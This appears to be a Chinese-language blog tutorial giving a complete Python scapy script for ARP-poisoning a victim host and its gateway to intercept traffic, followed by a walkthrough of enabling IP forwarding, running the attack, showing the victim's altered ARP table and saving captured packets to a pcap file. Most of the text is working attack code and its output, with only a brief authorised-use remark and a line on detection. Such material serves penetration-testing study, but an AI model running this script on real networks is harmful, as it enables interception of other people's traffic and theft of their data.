直接上实例,具体意思我都在源码上备注了
#-*-coding:utf-8-*-
import os
import signal
import string
import sys
import threading
import time

from scapy.all import *
# --- attack parameters -------------------------------------------------------
interact = "eth0"            # local interface used both for ARP and for sniffing
target_ip = "192.168.2.245"  # victim whose ARP cache gets poisoned
gatway_ip = "192.168.2.254"  # real gateway the victim is redirected away from
packet_count = 1000          # packets to capture before the attack is torn down

# Bind scapy's send/sniff to that interface and turn off its verbose output.
conf.iface, conf.verb = interact, 0
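def get_mac(ip_address):
    """Resolve *ip_address* to a MAC address with an ARP who-has.

    The request is sent as an Ethernet broadcast, the form every host on
    the segment answers.  The original frame used a made-up unicast
    destination (01:02:03:04:05:06); that presumably only got answers
    because switches flood frames for unknown unicast addresses.

    Returns the sender MAC of the first reply, or None when nobody answered
    within ``retry`` attempts of ``timeout`` seconds each.
    """
    responses, unanswered = srp(
        Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=ip_address),
        timeout=2,
        retry=10,
    )
    for sent, received in responses:
        return received[Ether].src
    return None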
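def restore_target(gatway_ip, gatway_mac, target_ip, target_mac):
    """Put the real MAC addresses back into both poisoned ARP caches.

    Two ARP replies are sent five times each: one addressed to the target
    saying "gatway_ip is at gatway_mac", one addressed to the gateway saying
    "target_ip is at target_mac".  The original pairing was wrong -- it sent
    the first reply to the gateway about itself and told the target that the
    gateway was at target_mac -- so the victim stayed cut off after the
    "restore" and the gateway's cache was never repaired.

    Finally SIGINT is sent to our own process so that a sniff() blocking in
    the main thread is interrupted.  A caller in the main thread therefore
    gets a KeyboardInterrupt right after the replies go out.
    """
    print("[*] Restoring target...")
    send(ARP(op=2, psrc=gatway_ip, pdst=target_ip,
             hwdst="ff:ff:ff:ff:ff:ff", hwsrc=gatway_mac), count=5)
    send(ARP(op=2, psrc=target_ip, pdst=gatway_ip,
             hwdst="ff:ff:ff:ff:ff:ff", hwsrc=target_mac), count=5)
    # os.getpid must be *called* and os.kill takes the signal positionally;
    # the original passed the function object and an unknown keyword, which
    # raised TypeError here every time.
    os.kill(os.getpid(), signal.SIGINT)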
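def poison_target(gatway_ip, gatway_mac, target_ip, target_mac, stop_event=None):
    """Keep both ARP caches poisoned until told to stop.

    Every two seconds two ARP replies are sent: the target is told that
    gatway_ip is at our MAC and the gateway is told that target_ip is at our
    MAC (hwsrc is left unset, so scapy's default -- the sending interface's
    address -- goes in).  With both caches pointing at this host, traffic in
    both directions flows through it; IP forwarding must be on or the victim
    simply loses connectivity.

    stop_event: optional threading.Event.  When it is set the loop returns
    without touching the caches; the caller is expected to call
    restore_target().  Without it the loop runs until the process ends.
    The KeyboardInterrupt handler below is only ever reached when this
    function runs in the main thread -- Python delivers Ctrl-C to the main
    thread only, so in a worker thread (how the script uses it) it never
    fired and the original loop was unstoppable.
    """
    # Reply "gatway_ip is at <our MAC>", addressed to the target.
    poison_target_pkt = ARP(op=2, psrc=gatway_ip, pdst=target_ip, hwdst=target_mac)
    # Reply "target_ip is at <our MAC>", addressed to the gateway.
    poison_gateway_pkt = ARP(op=2, psrc=target_ip, pdst=gatway_ip, hwdst=gatway_mac)

    print("[*] Beginning the ARP poison.[CTRL-C to stop]")
    # Caches expire, so the replies have to be refreshed continuously.
    while stop_event is None or not stop_event.is_set():
        try:
            send(poison_target_pkt)
            send(poison_gateway_pkt)
            time.sleep(2)
        except KeyboardInterrupt:
            restore_target(gatway_ip, gatway_mac, target_ip, target_mac)
            print("[*] ARP poison attack finised")
            return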
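def main():
    """Resolve both MACs, start the poisoner, capture, then restore and exit.

    Exits with status 0 when either MAC lookup fails.  The poison loop runs
    in a daemon thread so it cannot keep the process alive once the capture
    is written (the original thread was non-daemon and looped forever, so
    the script never terminated on its own).  The caches are restored
    exactly once, whether the capture completed or Ctrl-C ended it.
    """
    print("[*] Setting up %s" % interact)
    gatway_mac = get_mac(gatway_ip)
    if gatway_mac is None:
        print("[!!!] Faile to get gatway MAC.Exiting")
        sys.exit(0)
    print("[*] Gatway %s is at %s" % (gatway_ip, gatway_mac))

    target_mac = get_mac(target_ip)
    if target_mac is None:
        print("[!!!] Faile to get target_mac MAC.Exiting")
        sys.exit(0)
    print("[*] target_mac %s is at %s" % (target_ip, target_mac))

    poison_thread = threading.Thread(
        target=poison_target, args=(gatway_ip, gatway_mac, target_ip, target_mac))
    poison_thread.daemon = True  # must not outlive the capture below
    poison_thread.start()

    try:
        print("[*] Starting sniffer for %d packets" % packet_count)
        # Both directions of the victim's IP traffic.
        bpf_filter = "ip host %s" % target_ip
        packets = sniff(count=packet_count, filter=bpf_filter, iface=interact)
        wrpcap('arper.pcap', packets)
    except KeyboardInterrupt:
        pass
    finally:
        # restore_target sends SIGINT to the process to abort sniff(); we are
        # already past it, so swallow the resulting KeyboardInterrupt instead
        # of restoring a second time and dying with a traceback.
        try:
            restore_target(gatway_ip, gatway_mac, target_ip, target_mac)
        except KeyboardInterrupt:
            pass
    sys.exit(0)


if __name__ == "__main__":
    main()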
这样客户端 192.168.2.245 就会把我们的机器当成网关；脚本同时还向网关发送伪造应答（poison_gatewy），所以网关也会把我们当成客户端，双向流量都会经过本机。（只应在自己有权测试的网络中使用。）
在启动脚本之前，先在本机开启 IP 转发，否则客户端发往“网关”（即本机）的包会被内核直接丢弃，目标立刻断网，欺骗也更容易被发现：
echo 1 > /proc/sys/net/ipv4/ip_forward
（注意重定向方向：原文的 `echo >1 /proc/...` 只会在当前目录生成一个名为 1 的文件，转发并不会打开。）
未启动脚本之前，在客户端用 arp -a 查看：
C:\Documents and Settings\Administrator>arp -a

Interface: 192.168.2.245 --- 0x2
  Internet Address      Physical Address      Type
  192.168.2.254         00-30-18-1c-4b-29     dynamic
  192.168.101.1         bc-5f-f6-a9-19-1d     dynamic
启动脚本：
root@myspuerkali:~/python# python arper.py
[*] Setting up eth0
[*] Gatway 192.168.2.254 is at 00:30:18:1c:4b:29
[*] target_mac 192.168.2.245 is at 00:0c:29:ca:e8:e0
[*] Beginning the ARP poison.[CTRL-C to stop]
[*] Starting sniffer for 1000 packets
再查看客户机的 ARP 表：
C:\Documents and Settings\Administrator>arp -a
Interface: 192.168.2.245 --- 0x2
Internet Address Physical Address Type
192.168.2.88 d0-50-99-0a-e8-23 dynamic
192.168.2.249 00-50-56-2e-a2-d1 dynamic
192.168.2.254 00-50-56-2e-a2-d1 dynamic
192.168.101.1 bc-5f-f6-a9-19-1d dynamic
伪装成功：网关 192.168.2.254 的 MAC 已经变成 00-50-56-2e-a2-d1，和 192.168.2.249（应该就是本机）一样，客户端发往网关的流量会先到我们这里。顺带一提，“两个 IP 对应同一个 MAC”正是 ARP 欺骗最直观的检测特征，arpwatch 之类的工具就是靠它告警的。
又因为脚本里有这一行：
wrpcap('arper.pcap', packets)
所以抓满 1000 个包之后，脚本目录下会生成一个 arper.pcap 文件，
可以用 Wireshark 或 NetworkMiner 等工具打开和分析。
下篇文章将会简单介绍怎么处理pcap文件包